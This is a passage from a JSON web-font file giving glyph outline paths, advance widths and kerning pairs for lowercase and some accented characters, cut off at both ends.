,27,-6,35,-18r23,0r18,18r0,-2","w":335,"k":{"\u00d0":74,"\u00c0":274,"\u00d1":49,"\u00c9":80,"~":159,"z":-82,"y":80,"x":-100,"w":-52,"v":34,"u":-86,"t":95,"s":-38,"r":-97,"p":-102,"o":-26,"n":-128,"m":-160,"l":-21,"k":-60,"j":-88,"h":-101,"g":52,"f":33,"e":-42,"d":-69,"c":-21,"b":-31,"a":-104,"`":122,"@":124,"?":60,";":53,":":158,"9":-80,"7":-32,"6":-51,"5":-119,"4":39,"3":-70,"2":-145,"1":-98,"\/":-91,".":153,"-":97,"&":138,"%":-109,"#":124,"!":50}},"m":{"d":"879,-269v0,-29,18,-265,-20,-273v-2,0,-19,25,-51,76v-109,169,-167,260,-176,272v-91,125,-162,188,-213,188v-51,0,-79,-56,-84,-167v-1,-31,2,-128,9,-291v1,-37,-2,-55,-9,-55v-21,0,-77,82,-168,247v-93,167,-142,282,-148,343v-2,25,-17,37,-46,37v-13,0,-26,-21,-36,-64v-8,-33,-11,-57,-11,-73v1,-206,1,-374,39,-522v16,-61,34,-92,55,-92v24,0,61,25,55,47v-39,142,-60,288,-61,438v72,-129,122,-216,150,-259v81,-125,145,-187,191,-187v55,0,82,66,79,197v-1,14,-3,46,-6,95v-7,87,-9,168,10,225v24,-7,66,-50,125,-130v49,-66,90,-128,124,-186v88,-152,152,-228,192,-228v40,0,71,38,76,115r15,218v12,178,43,268,94,269v19,1,37,-9,52,-29v15,-20,27,-31,36,-31v19,0,28,10,28,30v0,27,-17,51,-50,70v-26,15,-48,22,-67,22v-57,0,-104,-42,-141,-125v-29,-65,-43,-124,-43,-177","w":1200,"k":{"\u00d0":67,"\u00c1":31,"\u00c0":296,"\u00a2":50,"\u00d1":43,"\u00c9":-100,"~":534,"z":-98,"y":-83,"x":-90,"w":-98,"v":55,"u":-116,"t":89,"s":-79,"r":-99,"q":-131,"p":-92,"o":-93,"n":-129,"m":-164,"l":-68,"k":-106,"j":87,"i":-70,"h":-102,"g":-92,"f":32,"e":-113,"d":-95,"c":-103,"b":-123,"a":-107,"`":431,"@":85,"?":283,";":121,":":34,"9":99,"8":-21,"7":-23,"6":-97,"5":-78,"4":48,"3":-132,"2":-98,"1":27,"0":-93,"\/":-57,".":-27,"-":90,",":112,")":83,"(":-57,"%":-57,"$":87,"#":122,"!":310}},"n":{"d":"81,-238r17,-30v143,-243,245,-364,305,-364v57,0,105,40,113,125r18,190v11,104,17,163,20,177v15,93,38,140,67,140v13,0,30,-12,52,-35r37,12v7,42,-46,82,-84,83v-96,0,-156,-108,-178,-325v-5,-51,-10,-122,-21,-211v-7,-55,-17,-82,-28,-82v-23,0,-78,70,-167,210v-89,140,-152,270,-189,389v-9,32,-26,48,-49,48v-30,0,-44,-15,-41,-45v1,-11,25,-152,64,-424v5,-34,5,-81,10,-141v5,-55,25,-82,60,-82v20,0,34,7,41,22r12,45","w":716,"k":{"\u00c1":-20,"\u00c2":-52,"\u00c0":312,"\u00c9":-102,"~":520,"z":-148,"y":-113,"x":-139,"w":-137,"u":-155,"t":39,"s":-121,"r":-140,"q":-169,"p":-133,"o":-127,"n":-165,"m":-204,"l":-95,"k":-134,"j":45,"i":-99,"h":-142,"g":-123,"e":-148,"d":-145,"c":-133,"b":-143,"a":-153,"`":416,"@":60,"?":136,";":72,"9":35,"8":-59,"7":-72,"6":-129,"5":-133,"3":-161,"2":-163,"0":-109,"\/":-119,".":-30,"-":42,",":37,")":20,"(":-84,"%":-119,"$":26,"#":86,"!":58}},"o":{"d":"258,-584v-12,-7,-29,-15,-29,-33v0,-23,24,-46,72,-69v40,-19,70,-29,89,-29v108,0,164,83,168,250v2,81,-34,187,-107,319v-85,154,-178,235,-279,244v-115,11,-187,-93,-187,-210v0,-103,24,-214,73,-334v49,-120,95,-179,138,-179v39,0,58,16,58,49v0,9,-11,29,-33,58v-105,139,-158,268,-158,389v0,104,26,156,78,156v79,0,155,-72,231,-215v66,-124,99,-224,99,-299v0,-109,-27,-163,-81,-163v-41,0,-85,22,-132,66","w":628,"k":{"\u00d0":-96,"\u00c1":124,"\u00c2":28,"\u00c0":330,"\u00a2":-131,"\u00d1":-120,"\u00c9":100,"~":104,"z":-30,"y":-44,"x":-42,"w":-62,"v":-103,"u":-61,"t":-57,"s":-91,"r":-85,"q":-35,"p":-60,"o":-44,"n":-66,"m":-145,"l":-78,"k":-110,"j":147,"i":-63,"h":-79,"f":-87,"e":-48,"d":24,"c":-44,"b":-109,"`":481,"@":-38,"?":163,";":188,":":101,"9":-73,"8":-110,"7":81,"6":-77,"5":-85,"4":-67,"2":57,"1":36,"0":-128,"\/":88,".":174,"-":-72,",":240,")":219,"(":-66,"&":45,"%":87,"$":-88}},"p":{"d":"232,578v6,20,-52,45,-70,44v-56,-5,-99,-46,-130,-122v-35,-85,-42,-200,-41,-323v0,-142,16,-391,49,-746v9,-97,38,-146,85,-146v34,0,51,25,44,61r-49,249v137,-198,272,-297,407,-297v89,0,133,63,133,190v0,105,-47,221,-140,348v-97,132,-190,198,-279,198v-67,0,-101,-34,-101,-103v0,-21,7,-48,21,-81r42,0v4,25,-7,63,-6,84v0,15,9,23,27,23v85,0,166,-67,245,-202v69,-118,104,-215,104,-290v0,-67,-18,-101,-54,-101v-72,0,-156,59,-253,178v-88,107,-139,196,-153,266v-25,120,-39,260,-40,419v-3,223,30,335,98,335r61,-22r0,38","w":706,"k":{"\u00d0":-111,"\u00c1":154,"\u00c2":30,"\u00c0":246,"\u00a2":-155,"\u00d1":-136,"\u00c9":143,"~":475,"z":-48,"x":-61,"w":-69,"v":-124,"u":-67,"t":-62,"s":-94,"r":-99,"q":35,"p":-36,"o":-45,"n":-77,"m":-155,"l":-85,"k":-106,"j":-77,"i":-66,"h":-79,"g":29,"f":-82,"e":-43,"d":40,"c":-41,"b":-107,"a":29,"`":457,"@":-51,"?":169,";":182,":":89,"9":-76,"8":-127,"7":93,"6":-74,"5":-86,"4":-37,"3":29,"2":105,"1":34,"0":-127,"\/":117,".":217,"-":-88,",":293,")":224,"(":-62,"&":57,"%":116,"$":-105,"#":-31}},"q":{"d":"734,457v0,64,-81,126,-144,126v-71,0,-123,-37,-158,-112v-24,-53,-36,-112,-36,-178v-1,-117,32,-326,88,-598v-186,240,-330,360,-431,360r-21,0v-52,4,-100,-64,-99,-115v0,-99,80,-244,239,-435v158,-189,273,-284,348,-284v63,0,95,42,95,127v0,61,-18,92,-55,92v-29,0,-44,-17,-44,-50v0,-17,23,-74,24,-88v0,-9,-4,-13,-12,-13v-29,0,-102,62,-219,186v-47,49,-103,123,-168,220v-86,127,-129,217,-129,271v0,7,5,10,15,10v52,0,142,-60,269,-179v122,-114,194,-195,207,-246r18,-69v11,-26,29,-39,54,-39v37,0,55,20,55,60r-18,0v28,-7,15,13,11,26v-60,207,-138,590,-138,786v0,89,32,206,106,206v33,0,57,-17,74,-49v17,-32,29,-48,38,-48v21,0,31,11,31,33","w":714,"k":{"\u00d0":-68,"\u00c1":-53,"\u00c2":50,"\u00c0":-182,"\u00a2":-117,"\u00d1":-91,"\u00c9":64,"~":37,"y":-293,"x":-72,"w":-39,"v":-89,"u":-40,"t":-38,"s":-66,"r":-75,"p":-150,"o":-20,"n":-55,"m":-132,"l":-68,"k":-92,"j":-552,"i":-45,"h":-65,"g":-166,"f":-62,"e":-31,"c":-27,"b":-91,"`":390,"@":-24,";":138,":":112,"9":-68,"8":-114,"7":78,"6":-55,"5":-69,"4":-40,"3":-36,"2":-99,"0":-112,".":137,"-":-43,",":125,")":97,"(":-50,"&":62,"$":-76,"!":23}},"r":{"d":"95,44v2,24,-34,52,-58,52v-37,0,-54,-29,-49,-87v23,-267,27,-395,0,-650v-3,-25,31,-62,56,-62v36,0,60,42,56,78v-9,70,-13,129,-12,176v83,-211,171,-316,266,-316v63,0,99,29,110,86v6,35,-5,52,-34,52v-39,1,-14,-68,-56,-68v-33,0,-75,34,-125,104v-106,149,-160,249,-161,472v0,3,2,58,7,163","w":536,"k":{"\u00d0":211,"\u00c1":375,"\u00c2":118,"\u00c0":497,"\u00a2":-97,"\u00d1":187,"\u00c9":322,"z":193,"y":50,"x":-50,"w":185,"v":91,"u":47,"t":143,"s":100,"r":-48,"q":217,"o":157,"n":171,"m":-51,"l":-30,"k":-50,"j":113,"i":44,"g":203,"f":95,"e":148,"d":249,"c":143,"b":-34,"a":241,"`":483,"@":57,"?":517,";":604,":":375,"8":-93,"7":255,"6":22,"5":51,"4":64,"3":223,"2":-62,"1":103,"0":-62,"\/":256,".":395,"-":241,",":406,")":291,"&":163,"%":253,"$":40,"#":256,"!":63}},"s":{"d":"374,-749v40,0,124,45,124,85v0,29,-12,43,-35,43v-9,1,-76,-41,-90,-37v-45,-4,-109,29,-190,99v-84,72,-126,134,-126,185v0,27,49,41,146,41v188,0,282,52,282,157v0,74,-42,140,-125,199v-76,53,-152,80,-227,80v-69,1,-147,-54,-143,-122v2,-34,41,-107,83,-87v-2,35,-18,48,-18,77v0,30,18,45,54,45v55,0,119,-18,190,-54v79,-40,119,-82,119,-126v0,-52,-62,-91,-116,-92r-192,-7v-60,-1,-154,-32,-154,-84v0,-66,52,-150,156,-251v104,-101,191,-151,262,-151","w":545,"k":{"\u00d0":295,"\u00c1":67,"\u00c0":476,"\u00a2":-127,"\u00d1":271,"\u00c9":-28,"z":-49,"y":-73,"x":-93,"w":-70,"v":34,"u":-95,"t":89,"s":-41,"r":-97,"q":-105,"p":-74,"o":-79,"n":-93,"m":-149,"l":-78,"k":-108,"j":118,"i":-67,"h":-90,"g":-75,"f":-67,"e":-98,"d":-51,"c":-91,"b":-119,"a":-66,"`":458,"?":141,";":171,":":105,"9":-64,"8":-141,"6":-90,"5":-30,"4":-103,"3":-99,"2":-77,"1":34,"0":-117,".":46,"-":325,",":119,")":134,"(":-61,"$":43,"#":162}},"t":{"d":"387,-517v-49,0,-82,21,-122,44v-8,77,-12,156,-8,260v7,177,46,265,119,265v21,0,40,-11,57,-32v17,-21,29,-32,36,-32v21,0,32,10,32,30v0,24,-20,47,-59,68v-33,17,-57,26,-73,26v-61,0,-108,-33,-145,-99v-63,-112,-61,-296,-49,-458v-37,13,-82,39,-135,78v-28,21,-47,0,-46,-48v0,-23,55,-61,165,-113v7,-1,13,-3,20,-5r22,-203v0,0,32,-135,67,-135v29,0,44,19,46,56r-41,249v56,-10,124,-22,177,10v42,25,62,54,43,90v-15,7,-25,15,-40,-3v-13,-32,-35,-48,-66,-48","w":537,"k":{"\u00c0":450,"\u00a2":-134,"\u00c9":-24,"~":167,"z":-116,"y":-58,"x":-107,"w":-77,"v":-104,"u":-118,"t":-33,"s":-85,"r":-108,"q":-115,"p":-103,"o":-81,"n":-138,"m":-173,"l":-93,"k":-122,"j":80,"i":-68,"h":-108,"g":-62,"f":27,"e":-101,"d":-90,"c":-86,"b":-117,"a":-113,"`":252,"@":-41,"?":71,";":91,":":37,"9":-91,"8":-83,"7":-29,"6":-84,"5":-115,"4":-45,"3":-103,"2":-141,"1":-25,"0":-139,"\/":-81,".":53,"-":25,",":45,")":39,"(":-77,"&":54,"%":-90,"$":-97,"#":-27}},"u":{"d":"617,-50v31,0,55,-37,85,-54v15,13,22,23,22,31v0,24,-16,45,-49,64v-27,15,-48,23,-65,23v-104,0,-165,-114,-182,-341r-1,-18v-71,149,-118,241,-139,274v-71,110,-147,165,-226,165v-63,0,-94,-63,-94,-188v0,-36,19,-133,57,-291v44,-180,81,-271,111,-272v25,-1,65,20,63,44v-2,21,-18,50,-25,71v-85,228,-127,388,-127,480v0,56,10,84,29,84v24,0,61,-31,112,-93v55,-67,109,-153,162,-258v60,-117,90,-207,91,-268v0,-38,28,-87,64,-86v33,0,50,17,50,50v0,5,-5,38,-17,98v-12,60,-18,117,-18,171v0,209,32,314,97,314","w":691,"k":{"\u00c1":-30,"\u00c2":-84,"\u00c0":229,"\u00a2":-75,"\u00d1":-26,"\u00c9":-129,"~":481,"z":-166,"y":-156,"x":-161,"w":-164,"v":-53,"u":-184,"s":-150,"r":-170,"q":-201,"p":-162,"o":-165,"n":-191,"m":-235,"l":-142,"k":-179,"i":-141,"h":-174,"g":-164,"f":-39,"e":-185,"d":-163,"c":-175,"b":-197,"a":-175,"`":377,"@":21,"?":206,";":58,"8":-94,"7":-93,"6":-169,"5":-141,"4":-31,"3":-203,"2":-154,"1":-47,"0":-167,"\/":-117,".":-57,"-":22,",":40,")":21,"(":-130,"&":-68,"%":-118,"#":55,"!":238}},"v":{"d":"704,-652v0,17,-23,30,-44,22v-40,-3,-107,78,-181,252r-148,348v-36,83,-63,125,-80,125v-22,0,-46,-37,-70,-112v-15,-48,-40,-128,-81,-238v-29,-78,-110,-225,-159,-317v-17,-34,20,-62,50,-63v26,0,69,72,130,217v3,7,41,105,113,293v21,54,30,81,27,81r35,-90v69,-175,115,-286,139,-333v77,-149,152,-223,225,-223v29,0,44,13,44,38","w":633,"k":{"\u00d0":-46,"\u00c1":190,"\u00c2":-40,"\u00c0":396,"\u00a2":-252,"\u00d1":-70,"\u00c9":163,"~":443,"z":-53,"y":-104,"x":-194,"w":-67,"v":-159,"u":-111,"s":-56,"r":-205,"q":33,"p":-154,"n":-76,"m":-209,"l":-183,"k":-204,"j":-48,"i":-77,"h":-170,"g":46,"f":-59,"d":88,"b":-188,"a":75,"`":339,"@":-98,"?":229,";":206,":":128,"9":-166,"8":-241,"7":98,"6":-133,"5":-99,"4":-88,"3":43,"2":90,"1":-51,"0":-216,"\/":130,".":237,",":296,")":138,"(":-148,"%":130,"$":-96,"!":-90}},"w":{"d":"709,-739v0,-25,69,-56,99,-56v52,0,94,39,120,120v54,167,38,263,-36,443v-104,252,-244,264,-375,43v-41,-69,-77,-153,-108,-250v-25,63,-63,163,-122,295v-77,170,-147,253,-203,253v-40,0,-69,-37,-87,-110v-12,-51,-17,-96,-14,-136v4,-71,9,-172,24,-301v12,-108,39,-161,74,-161v31,0,46,20,46,59v-38,183,-67,357,-67,437v0,82,-2,123,14,123v37,0,89,-69,156,-206v44,-90,86,-176,111,-264r34,-120v22,-64,36,-88,84,-60v17,10,24,24,23,39v-6,57,11,145,50,264v48,145,108,217,180,217v35,0,71,-48,106,-146v42,-119,63,-222,49,-347v-10,-88,-35,-132,-72,-132v-3,-1,-39,13,-43,12v-29,0,-43,-5,-43,-16","w":1026,"k":{"\u00d0":-95,"\u00c1":153,"\u00c2":46,"\u00c0":359,"\u00a2":-142,"\u00d1":-120,"\u00c9":157,"~":36,"y":-26,"x":-57,"w":-40,"v":-95,"u":-43,"t":-42,"s":-74,"r":-73,"p":-46,"o":-27,"n":-49,"m":-129,"l":-67,"k":-97,"j":74,"i":-47,"h":-65,"f":-71,"e":-32,"d":42,"c":-30,"b":-94,"a":24,"`":477,"@":-31,";":206,":":116,"9":-63,"8":-112,"7":95,"6":-61,"5":-72,"4":-56,"2":-74,"1":49,"0":-114,"\/":105,".":230,"-":-71,",":297,")":230,"(":-53,"&":57,"%":101,"$":-94,"!":24}},"x":{"d":"581,-864v23,0,44,33,44,56v0,15,-51,80,-154,195v-103,115,-154,181,-154,197v0,16,44,66,133,150v89,84,144,129,163,135v5,0,47,19,61,19v19,0,41,-11,65,-33v25,-3,37,6,37,27v0,17,-19,35,-56,52v-31,15,-52,22,-63,22v-87,0,-216,-99,-388,-298v-59,51,-224,324,-221,417v0,14,6,35,17,63r-39,14v-16,-11,-55,-85,-55,-111v0,-61,39,-151,117,-270v78,-119,117,-176,117,-169v0,-1,-38,-48,-115,-142v-77,-94,-116,-156,-116,-186v-1,-17,19,-46,36,-46v20,0,66,50,137,148v71,98,110,147,116,147v1,0,48,-64,141,-193v93,-129,152,-194,177,-194","w":791,"k":{"\u00d0":277,"\u00c1":72,"\u00c0":310,"\u00d1":253,"~":133,"z":-61,"y":-69,"x":-63,"w":-75,"v":54,"u":-106,"t":84,"s":-55,"r":-87,"q":-107,"p":-78,"o":-87,"n":-105,"m":-156,"l":-72,"k":-102,"j":97,"i":-65,"h":-96,"g":-73,"f":36,"e":-105,"d":-56,"c":-98,"b":-121,"a":-78,"`":239,"@":63,"?":55,";":162,":":133,"9":104,"6":-90,"4":100,"3":-113,"2":-53,"1":26,"0":-97,".":57,"-":296,",":143,")":121,"(":-55,"#":84,"!":93}},"y":{"d":"140,642v-97,0,-183,-41,-260,-123v-67,-71,-101,-135,-101,-193v0,-28,11,-42,34,-42v27,-1,33,50,41,75v34,102,127,191,244,201v142,12,256,-66,337,-235v128,-268,120,-528,51,-876v-57,146,-104,254,-141,325v-76,143,-149,229,-222,250v-87,26,-132,-27,-132,-142v0,-91,24,-218,71,-383v50,-173,94,-262,131,-265v25,-3,77,30,61,56v-79,129,-181,397,-181,584v0,57,8,85,25,85v21,0,54,-35,101,-106v23,-34,43,-73,68,-114v92,-150,150,-271,165,-368v5,-35,6,-65,3,-92v-5,-45,11,-68,49,-68v39,0,60,47,66,114v14,149,34,241,55,276v11,19,17,111,17,276v0,151,-33,302,-99,453v-91,208,-218,312,-383,312","w":707,"k":{"\u00d0":-67,"\u00c1":39,"\u00c0":46,"\u00a2":-91,"\u00d1":-90,"\u00c9":-34,"~":92,"z":-92,"y":-162,"x":-86,"w":-66,"v":-73,"u":-103,"t":-42,"s":-87,"r":-83,"q":-83,"p":-71,"o":-82,"n":-112,"m":-155,"l":-71,"k":-103,"j":-390,"i":-65,"h":-91,"g":-63,"f":-96,"e":-99,"d":-74,"c":-93,"b":-117,"a":-90,"`":496,"?":22,";":49,":":55,"9":-55,"8":-82,"6":-88,"5":-89,"4":-93,"3":-118,"2":-113,"1":-74,"0":-119,"\/":-86,".":39,"-":-44,",":25,"(":-59,"%":-89,"$":-52,"!":27}},"z":{"d":"511,-95v99,-2,228,49,223,137v0,5,-5,18,-15,38v-16,1,-47,-17,-46,-30v1,-48,-42,-72,-131,-72v-67,0,-212,37,-436,112v-44,15,-70,22,-78,22v-35,0,-47,-22,-43,-61v-25,-15,-38,-28,-38,-41v0,-38,34,-88,103,-149v103,-91,216,-182,340,-273v129,-95,197,-146,204,-152r10,-9v-106,-11,-404,46,-503,73v-39,11,-75,-11,-72,-47v-6,-29,63,-62,90,-62v41,0,184,-35,432,-35v91,0,136,23,136,69v0,23,-27,62,-89,109r-124,95r-286,215v-95,75,-147,128,-156,158v7,0,17,1,30,2v243,-66,392,-99,449,-99","w":786,"k":{"\u00d0":47,"\u00c1":46,"\u00c0":364,"\u00a2":-81,"\u00d1":21,"\u00c9":-53,"~":566,"z":-88,"y":-47,"x":-84,"w":-72,"v":-67,"u":-93,"t":79,"s":-61,"r":-85,"q":-101,"p":-77,"o":-60,"n":-109,"m":-144,"l":-30,"k":-69,"j":97,"i":-32,"h":-83,"g":-56,"f":51,"e":-81,"d":-88,"c":-66,"b":-77,"a":-93,"`":462,"@":31,"?":165,";":121,":":66,"8":-72,"6":-64,"5":-83,"4":49,"3":-93,"2":-113,"1":37,"0":-67,"\/":-75,"-":77,",":70,")":59,"&":62,"%":-75,"$":-24,"#":82,"!":66}},"{":{},"|":{},"}":{},"~":{"d":"415,-702v-66,0,-105,-70,-168,-73v-33,-2,-72,34,-93,58v-11,13,-23,18,-31,18v-14,0,-21,-8,-21,-23v-2,-7,60,-89,64,-93v22,-22,47,-42,85,-42v25,0,59,16,102,48v39,28,68,38,88,31v11,-1,69,-55,86,-55v18,0,30,25,17,42v-43,59,-85,89,-129,89","w":628,"k":{"\u00d0":488,"\u00c1":372,"\u00c2":294,"\u00c0":364,"\u00a2":-106,"\u00d1":443,"\u00c9":538,"~":57,"z":438,"y":113,"x":-36,"w":557,"v":429,"u":459,"t":130,"s":249,"r":213,"q":449,"p":88,"o":477,"n":444,"m":417,"l":-58,"k":-66,"j":62,"i":328,"h":-24,"g":446,"f":88,"e":458,"d":518,"c":462,"b":-30,"a":478,"`":236,"Z":492,"Y":176,"X":89,"W":-164,"V":-153,"U":145,"T":402,"S":-67,"R":135,"Q":-34,"P":43,"O":-34,"N":-168,"M":-183,"L":72,"K":-129,"J":138,"I":158,"H":77,"F":-117,"E":-141,"D":-172,"C":40,"B":-167,"A":434,"@":140,"?":-82,";":442,":":353,"9":-24,"8":-106,"7":478,"6":77,"5":31,"4":50,"3":443,"2":-150,"1":98,"0":-53,"\/":466,".":294,"-":511,",":363,")":262,"(":28,"&":139,"%":422,"$":-114,"#":-24,"!":35}},"\u00c4":{},"\u00c5":{},"\u00c7":{},"\u00c9":{"k":{"\u00d0":805,"\u00c0":287,"\u00a2":594,"\u00d1":965,"\u00c9":-41,"~":594,"z":-138,"y":-93,"x":-111,"w":-105,"v":73,"u":-122,"t":102,"s":-98,"r":-99,"q":-157,"p":-94,"o":-100,"n":-131,"m":-165,"l":-61,"k":-100,"j":91,"i":-66,"h":-103,"g":-115,"f":40,"e":-125,"d":-125,"c":-110,"b":-116,"a":-135,"`":491,"Z":-167,"X":-155,"W":193,"V":344,"U":-58,"T":290,"S":-45,"R":81,"Q":-104,"P":44,"O":-105,"N":113,"M":94,"K":-138,"J":211,"I":53,"G":-108,"D":39,"C":-132,"B":-112,"A":-90,"@":146,"?":864,";":105,":":34,"9":317,"8":-30,"7":-45,"6":-95,"5":-112,"4":454,"3":-230,"2":-161,"1":32,"0":-81,"\/":-95,".":32,"-":644,",":97,")":59,"(":-50,"%":-95,"$":537,"#":133,"!":335}},"\u00d1":{"k":{"\u00d0":-47,"\u00c1":1226,"\u00c2":66,"\u00c0":1017,"\u00a2":-53,"\u00d1":-71,"\u00c9":1051,"~":584,"z":270,"x":113,"w":-47,"v":-44,"u":-26,"t":-49,"s":-80,"r":-46,"q":53,"p":-25,"n":-31,"m":-111,"l":-45,"k":-78,"j":114,"i":-36,"h":-44,"g":44,"f":30,"d":110,"b":-78,"a":110,"`":481,"Z":226,"Y":93,"X":116,"W":240,"V":306,"U":63,"T":299,"R":119,"Q":-101,"P":59,"O":-100,"N":177,"M":168,"L":119,"K":-123,"J":312,"I":168,"H":-36,"G":-98,"F":-71,"E":-34,"D":48,"C":-92,"A":140,"?":215,";":245,":":139,"9":-67,"8":137,"7":147,"6":-44,"5":-107,"4":-53,"3":163,"2":348,"1":70,"0":-99,"\/":211,".":286,"-":-24,",":355,")":270,"(":-35,"&":137,"%":212,"$":-53,"#":58,"!":40}},"\u00d6":{},"\u00dc":{},"\u00e1":{"d":"707,-908v-33,15,-91,40,-174,71v-22,8,-49,2,-49,-22v0,-13,9,-23,26,-30v111,-48,192,-103,242,-166v35,-26,120,13,89,60v-16,25,-61,54,-134,87xm761,-85v0,81,-83,126,-163,96v-63,-23,-95,-97,-95,-222v0,-13,0,-27,1,-41v-66,88,-139,168,-218,241v-102,93,-182,140,-241,140v-57,0,-87,-44,-86,-104v0,-83,44,-196,134,-337v86,-136,181,-247,284,-334v112,-95,195,-125,249,-90v25,16,38,50,38,101v0,61,-21,94,-63,98v-29,2,-44,-8,-44,-31v10,-33,20,-66,20,-93v0,-15,-2,-22,-5,-21v-66,12,-172,114,-320,306v-148,192,-222,323,-222,396v0,25,11,38,34,38v58,0,149,-75,273,-225v86,-104,133,-162,141,-173v38,-53,60,-101,65,-145v3,-30,19,-45,48,-45v41,0,57,20,49,59v-33,171,-49,276,-49,313v0,68,15,105,45,114v18,5,49,-11,51,-24v7,-29,23,-43,50,-43v16,0,24,9,24,26","w":734},"\u00e0":{},"\u00e2":{},"\u00e4":{},"\u00e3":{},"\u00e5":{},"\u00e7":{},"\u00e9":{"d":"532,-847v-34,15,-92,40,-174,71v-22,8,-49,2,-49,-22v0,-13,8,-23,25,-30v112,-48,193,-103,243,-166v35,-26,120,12,88,60v-16,24,-60,54,-133,87xm198,-262v-43,0,-74,-10,-96,-29v-27,24,-59,179,-59,238v0,52,34,78,103,78v66,0,143,-38,232,-115v86,-75,146,-152,179,-231r32,0v13,12,17,23,13,34v-39,112,-104,205,-194,279v-86,71,-172,107,-259,107v-130,1,-195,-99,-187,-236v6,-100,59,-224,160,-372v109,-159,208,-238,297,-238v51,0,87,55,87,107v0,65,-28,140,-83,225v-66,102,-140,153,-225,153xm407,-677v-25,6,-48,21,-69,46v-139,163,-208,257,-208,284v0,7,15,12,46,14v52,3,109,-35,170,-112v60,-75,90,-143,90,-202v0,-25,-10,-35,-29,-30","w":626},"\u00e8":{},"\u00ea":{},"\u00eb":{},"\u00ed":{"d":"329,-826v-33,15,-91,40,-174,71v-22,8,-49,2,-49,-22v0,-13,9,-23,26,-30v111,-48,192,-103,242,-166v35,-26,120,13,89,60v-16,25,-61,54,-134,87xm269,55v0,31,-55,65,-86,64v-63,0,-112,-49,-145,-148v-49,-145,-42,-247,-13,-418v21,-126,52,-188,90,-188v30,0,45,17,45,52v0,16,-10,46,-28,90v-20,48,-42,129,-42,245v0,55,1,87,0,98r26,124v17,55,43,82,77,82v8,0,13,-1,16,-4v9,-13,22,-23,39,-31v14,12,21,23,21,34","w":315},"\u00ec":{},"\u00ee":{},"\u00ef":{},"\u00f1":{"d":"415,-702v-66,0,-105,-70,-168,-73v-33,-2,-72,34,-93,58v-11,13,-23,18,-31,18v-14,0,-21,-8,-21,-23v-2,-7,60,-89,64,-93v22,-22,47,-42,85,-42v25,0,59,16,102,48v39,28,68,38,88,31v11,-1,69,-55,86,-55v18,0,30,25,17,42v-43,59,-85,89,-129,89xm81,-238r17,-30v143,-243,245,-364,305,-364v57,0,105,40,113,125r18,190v11,104,17,163,20,177v15,93,38,140,67,140v13,0,30,-12,52,-35r37,12v7,42,-46,82,-84,83v-96,0,-156,-108,-178,-325v-5,-51,-10,-122,-21,-211v-7,-55,-17,-82,-28,-82v-23,0,-78,70,-167,210v-89,140,-152,270,-189,389v-9,32,-26,48,-49,48v-30,0,-44,-15,-41,-45v1,-11,25,-152,64,-424v5,-34,5,-81,10,-141v5,-55,25,-82,60,-82v20,0,34,7,41,22r12,45","w":716},"\u00f3":{"d":"523,-850v-33,15,-92,38,-174,70v-21,8,-48,2,-48,-21v0,-13,8,-23,25,-30v112,-49,189,-108,242,-166v29,-32,119,12,89,59v-16,25,-60,55,-134,88xm258,-584v-12,-7,-29,-15,-29,-33v0,-23,24,-46,72,-69v40,-19,70,-29,89,-29v108,0,164,83,168,250v2,81,-34,187,-107,319v-85,154,-178,235,-279,244v-115,11,-187,-93,-187,-210v0,-103,24,-214,73,-334v49,-120,95,-179,138,-179v39,0,58,16,58,49v0,9,-11,29,-33,58v-105,139,-158,268,-158,389v0,104,26,156,78,156v79,0,155,-72,231,-215v66,-124,99,-224,99,-299v0,-109,-27,-163,-81,-163v-41,0,-85,22,-132,66","w":628},"\u00f2":{},"\u00f4":{},"\u00f6":{},"\u00f5":{"d":"480,-751v-68,0,-103,-69,-167,-73v-32,-2,-72,35,-93,58v-12,13,-23,19,-32,19v-14,0,-21,-8,-21,-24v-2,-6,59,-89,64,-92v22,-24,46,-43,85,-43v25,0,60,16,103,48v39,29,68,39,87,31v11,0,69,-54,86,-54v18,0,30,25,17,42v-43,58,-85,88,-129,88xm258,-584v-12,-7,-29,-15,-29,-33v0,-23,24,-46,72,-69v40,-19,70,-29,89,-29v108,0,164,83,168,250v2,81,-34,187,-107,319v-85,154,-178,235,-279,244v-115,11,-187,-93,-187,-210v0,-103,24,-214,73,-334v49,-120,95,-179,138,-179v39,0,58,16,58,49v0,9,-11,29,-33,58v-105,139,-158,268,-158,389v0,104,26,156,78,156v79,0,155,-72,231,-215v66,-124,99,-224,99,-299v0,-109,-27,-163,-81,-163v-41,0,-85,22,-132,66","w":628},"\u00fa":{"d":"523,-850v-33,15,-92,38,-174,70v-21,8,-48,2,-48,-21v0,-13,8,-23,25,-30v112,-49,189,-108,242,-166v29,-32,119,12,89,59v-16,25,-60,55,-134,88xm617,-50v31,0,55,-37,85,-54v15,13,22,23,22,31v0,24,-16,45,-49,64v-27,15,-48,23,-65,23v-104,0,-165,-114,-182,-341r-1,-18v-71,149,-118,241,-139,274v-71,110,-147,165,-226,165v-63,0,-94,-63,-94,-188v0,-36,19,-133,57,-291v44,-180,81,-271,111,-272v25,-1,65,20,63,44v-2,21,-18,50,-25,71v-85,228,-127,388,-127,480v0,56,10,84,29,84v24,0,61,-31,112,-93v55,-67,109,-153,162,-258v60,-117,90,-207,91,-268v0,-38,28,-87,64,-86v33,0,50,17,50,50v0,5,-5,38,-17,98v-12,60,-18,117,-18,171v0,209,32,314,97,314","w":691},"\u00f9":{},"\u00fb":{},"\u00fc":{},"\u00b0":{},"\u00a2":{"d":"177,-394v-151,29,-243,-80,-243,-226v0,-73,30,-166,89,-281v65,-127,140,-218,223,-273v15,-63,33,-117,50,-162v14,-39,99,-21,80,24v-12,28,-23,60,-34,96v55,-10,74,-5,131,20v49,21,72,47,76,77v3,22,-25,45,-46,45v-15,0,-34,-12,-57,-36v-38,-42,-74,-44,-126,-22v-50,202,-78,413,-85,633v101,-37,186,-110,256,-219v12,-17,29,-10,40,6v7,10,10,19,8,26v-6,21,-43,67,-113,134v-111,106,-88,92,-192,146v1,67,5,124,12,169v4,25,-3,37,-22,37v-17,0,-27,-11,-31,-34v-7,-45,-13,-98,-16,-160xm14,-606v0,85,35,127,106,127v19,0,38,-1,55,-4v-1,-195,14,-385,47,-572v-55,61,-105,143,-149,246v-39,91,-59,159,-59,203","w":683,"k":{"\u00d0":212,"\u00c1":481,"\u00c2":187,"\u00c0":667,"\u00a2":-24,"\u00d1":186,"\u00c9":761,"~":124,"z":152,"y":114,"w":149,"v":20,"u":119,"t":199,"s":159,"q":259,"p":60,"o":185,"n":117,"l":26,"j":272,"i":123,"h":50,"g":269,"f":160,"e":225,"d":360,"c":214,"b":34,"a":308,"`":325,"Z":340,"Y":83,"W":-22,"V":204,"U":157,"T":177,"R":159,"Q":30,"P":124,"O":32,"